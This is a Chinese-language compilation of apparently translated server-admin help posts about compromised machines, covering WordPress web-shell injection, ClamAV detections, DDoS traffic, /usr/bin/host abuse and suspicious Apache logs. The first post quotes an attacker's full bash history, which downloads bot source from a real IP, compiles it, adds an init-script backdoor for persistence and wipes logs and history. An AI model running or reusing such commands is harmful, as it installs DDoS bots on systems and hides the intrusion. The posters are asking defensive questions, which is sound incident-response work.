我们今天使用 Putty 远程登录到我们的 CentOS 服务器，在使用向上箭头浏览之前的命令时，偶然发现了以下内容：

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

（为了清晰起见，用换行符替换了&&）

我从来没有运行过这些命令，永远！这是怎么发生的，我的服务器被黑客入侵了吗？我立即更改了我的 root 密码，但希望有人能对这里发生的事情有所了解。

我看到源代码中提到了 ddos​​ bots，我和我的同事都非常担心！

提前致谢！

经过几个月的疏忽、电子邮件火焰和管理斗争，我们当前的系统管理员被解雇并将“服务器凭据”交给我。此类凭据仅包含 root 密码，仅此而已：没有程序、没有文档、没有提示，什么也没有。

我的问题是：假设他留下了诱杀装置，我如何在尽可能少的停机时间的情况下优雅地接管服务器？

以下是详细信息：

• 一台位于地下室服务器群中的生产服务器；ubuntu 服务器 9.x 可能，带有 grsec 补丁（我上次问管理员时听到的谣言）
• 一台包含所有内部文档、文件存储库、wiki 等的内部服务器。同样，ubuntu 服务器，已有几年的历史了。

假设两台服务器都已打补丁并且是最新的，所以除非有充分的理由（即可以向高层管理人员解释），否则我宁愿不尝试入侵。

生产服务器托管了一些网站（标准的 apache-php-mysql）、一个 LDAP 服务器、一个 ZIMBRA 电子邮件套件/服务器，据我所知还有一些正在运行的 vmware 工作站。不知道里面发生了什么。一个可能是 LDAP 主机，但这是一个疯狂的猜测。

内部服务器有一个内部 wiki/cms、一个从生产服务器复制凭据的 LDAP 从属服务器、更多的 vmware 工作站和正在运行的备份。

我可以去服务器场的管理员，指向服务器，告诉他们“请sudo关闭该服务器”，以单用户模式登录并按照我的方式进行。内部服务器也一样。尽管如此，这将意味着停机，高层管理人员不高兴，老系统管理员回击我说'看到了吗？你不能做我的工作和其他麻烦事，最重要的是我可能不得不失去几周的无薪时间。

在频谱的另一端，我可以只以 root 身份登录并通过服务器来尝试了解正在发生的事情。所有引发意外的风险都被抛在脑后。

我正在寻找中间的解决方案：尝试让一切保持原样运行，同时了解正在发生的事情和方式，最重要的是避免触发任何遗留的陷阱。

你有什么建议？

到目前为止，我考虑过使用内部服务器“练习”，断开网络连接，使用 live cd 重新启动，将根文件系统转储到 USB 驱动器中，然后将其加载到断开连接的隔离虚拟机上，以了解以前的系统管理员方式思考（a-la '了解你的敌人'）。可以在生产服务器上实现同样的壮举，但完整的转储会引起人们的注意。也许我可以以 root 用户身份登录，检查 crontab，检查 .profile 中启动的任何命令，转储 lastlog，以及任何想到的。

这就是我在这里的原因。任何提示，无论多么小，都将不胜感激。

时间也是一个问题：可能会在几个小时或几周内触发。感觉就像那些糟糕的好莱坞电影之一，不是吗？

从昨天开始，我的一个网站上发生了奇怪的事情。

我在 IIS 上的 wordpress 站点的 index.php 从 1 kb 更改为 80 KB。map.xml 和 sitemap.xml 也是目录中的新内容。在 wp-content/themes 或 wp-content/includes 文件夹中还可以找到一些其他文件。像 b.php 或 e.asp。

在日志中，我可以找到一个显示我认为的过程的条目。POST /wordpress/wordpress/wp-content/plugins/easyrotator-for-wordpress/b.php - 80 或 POST /wp-content/themes/koppers12/library/e.asp |26|800a0408|Invalid_character 80

这可能与我的安全设置可能不太严格的事实有关，但是我无法弄清楚如何加强安全性，但让 wordpress 本身、主题和插件的更新机制起作用。

目前，整个网站的权限 (iusr) 设置为读写。如果我将其更改为只读，则由于权限较少，整个更新机制失败

有什么方法可以防止在网站上注入不需要的文件，同时还能更新 wordpress、主题和插件？

所使用的注入可能是对某些插件的利用，还是由于该站点的权限而注入了不需要的文件？

（我已经阻止了导致这种情况的 ip 地址，但这并没有多大帮助，因为这种注入方法已经在其他 ip 地址/范围上看到过。）

今天 clamAV 扫描了我的 AWS 实例，并在每个实例上检测到 24 个受感染的文件。由于以下几个原因，它看起来像是误报：

1. 所有这些文件都是在 2022 年 10 月创建的（为什么现在才检测到它们？）
2. 每个实例的SSH端口由MFA+密码+VPN保护。

那么，我的问题是，在这种情况下我的下一步应该是什么？我应该删除这些文件吗？据我了解，它们可能是其他应用程序可以使用的系统文件。

2023-06-07T13:03:41.658+03:00   /snap/amazon-ssm-agent/6563/amazon-ssm-agent: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:42.909+03:00   /snap/amazon-ssm-agent/6563/ssm-agent-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:44.659+03:00   /snap/amazon-ssm-agent/6563/ssm-cli: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:45.660+03:00   /snap/amazon-ssm-agent/6563/ssm-document-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:46.910+03:00   /snap/amazon-ssm-agent/6563/ssm-session-logger: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:47.910+03:00   /snap/amazon-ssm-agent/6563/ssm-session-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:49.411+03:00   /snap/amazon-ssm-agent/6312/amazon-ssm-agent: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:50.662+03:00   /snap/amazon-ssm-agent/6312/ssm-agent-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:51.912+03:00   /snap/amazon-ssm-agent/6312/ssm-cli: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:52.912+03:00   /snap/amazon-ssm-agent/6312/ssm-document-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:53.913+03:00   /snap/amazon-ssm-agent/6312/ssm-session-logger: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:55.413+03:00   /snap/amazon-ssm-agent/6312/ssm-session-worker: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:56.695+03:00   /snap/lxd/24061/bin/lxc: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:57.414+03:00   /snap/lxd/24061/bin/lxc-to-lxd: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:58.164+03:00   /snap/lxd/24061/bin/lxd-agent: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:03:58.915+03:00   /snap/lxd/24061/bin/lxd-benchmark: Unix.Malware.Kaiji-10003916-0 FOUND

2023-06-07T13:04:01.666+03:00   /snap/lxd/24061/bin/lxd-migrate: …

昨天我们的 Digital Ocean 服务器遇到了类似攻击的问题。出站流量突然增加到700Mbps，而入站流量一直保持在0.1Mbps左右，甚至没有增加一次。流量持续了几分钟，直到假设我们正在执行 DoS（这是合理的），Digital Ocean 将我们的服务器从网络上切断。

我有两个假设：要么有人黑进了我们的服务器（在攻击之后我意识到我的同事已经启用了使用密码的 SSH 登录），要么存在某种我不知道的攻击。

任何人都可以为我清除这种情况吗？如果确实有一种DoS，流量看起来像那样，请教育我。

今天我注意到 Apache 网络服务器上异常高的请求率以及相当高的传入网络流量。在检查 Apache 的 mod_status 页面后，我发现有问题的 URL 来自 path www.server.com/www/wp-includes/js/tinymce/plugins/wpautoresize/。事实上，我在那里发现了几个被黑（混淆）的 PHP 脚本。

还注意到 www-data 用户执行的奇怪过程：

www-data  7300 10.8  0.1 2122900 18768 ?       Ssl  Jul11 121:47 /usr/bin/host

检查/proc/7300/cmdline发现这确实是原始/usr/bin/host二进制文件。netstat -anp显示它打开了许多 HTTP 连接，因此该二进制文件以某种方式被滥用。debsums确认二进制校验和没有问题。由于该过程是在 www-data 用户下运行的，我没有理由相信服务器本身受到了威胁。

这个二进制文件是如何被滥用的？

编辑：这不是广泛的“如何处理受损服务器”问题。而是关于一种特定类型的滥用的问题（并且已经是一个答案），它在技术上是如何完成的，因为这个特殊案例在它的工作方式上非常有创意。似乎这已经流行了好几年了（旧线程和 2012 年的问题），我本周遇到了它。

服务名称是一个 32 位的十六进制数字。它可能是随机生成的，因为对该号码的 Google 搜索没有找到任何内容。它指向一个 EXE 文件，该文件也有一个十六进制数作为名称，在一个也有一个十六进制数作为名称的文件夹中。

我怀疑这可能是某种恶意软件，因为命名看起来很奇怪，但恶意软件扫描没有标记它。它也可能是合法软件，但出于某种原因只是使用了奇怪的名称。

在 EXE 文件属性的详细信息选项卡中，文件描述为空白，但有一个产品版本（“3.13.11.3”）和版权（“Copyright (C) 2014”）对我帮助不大。

问题是：由于文件名没有提供任何线索，我如何确定服务实际是什么程序？

更新：他们还在这里。帮我阻止或困住他们！

嗨，SF'ers，

我刚刚有人入侵了我的客户网站之一。他们设法更改了一个文件，以便网站上的结帐页面将付款信息写入文本文件。

幸运或不幸的是，他们塞满了，代码中有一个错字，这破坏了网站，所以我马上就知道了。

我对他们如何做到这一点有一些了解：

我的网站 CMS 有一个文件上传区域，您可以在其中上传要在网站内使用的图像和文件。上传仅限于 2 个文件夹。我在这些文件夹中发现了两个可疑文件，在检查内容时，这些文件似乎允许黑客查看服务器的文件系统并上传自己的文件、修改文件甚至更改注册表项？！

我删除了一些文件并更改了密码，并且正在尝试保护 CMS 并通过扩展限制文件上传。

你们还有什么可以建议我做的，以尝试找出有关他们如何进入的更多详细信息，以及我可以做些什么来防止将来发生这种情况？

所以我收到了对我的一台运行 Debian 6.0 的专用服务器的滥用投诉

果然，有时会无缘无故地top显示/usr/bin/host使用大量 CPU，而 netstat 显示进程host执行了大量 HTTP 请求。

过了一会儿，我的系统日志甚至说nf_conntrack: table full, dropping packet.，我认为这与此事有关。

我已经/usr/bin/host使用 debsums验证了可执行文件，并且似乎也很好。服务器本身也是 100% 更新的。

所以我猜测有什么东西在以某种方式调用我的host可执行文件并强制它为某些 DDoS 执行 HTTP 请求。

我当然可以简单地编写一个脚本来host在发生这种情况时立即将其杀死，但我真的很想知道问题的根源。

我正在检查 Apache 日志中host是否有开始执行请求时有趣的条目，但还没有找到任何内容。

任何人都对其他事情有什么建议？我怎样才能看到谁和什么叫做“主机”？谷歌/usr/bin/host根本没有显示任何被滥用的例子！

可能重复：
我的服务器被黑了 紧急情况

我正在尝试确定此 linex 网络服务器/openfire 服务器是否已被某种形式的恶意软件或黑客入侵。你能帮我确定这个服务器是否被黑了吗？

下面的日志片段来自运行 apache 的 linux 服务器。前几天安装在服务器上的moodle站点开始渲染apache默认页面。访问日志还显示了一些我不确定的活动。请参阅下面的日志。

85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
85.190.0.3 - - [02/Apr/2012:13:31:01 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 303 "-" "-"
99.41.69.92 - - [02/Apr/2012:13:33:35 -0600] "GET /files/externallibs.php HTTP/1.1" 404 306 "-" "curl/7.18.0 (x86_64-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1"
212.34.151.92 - - [02/Apr/2012:14:01:46 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
212.34.151.92 - - [02/Apr/2012:14:01:46 …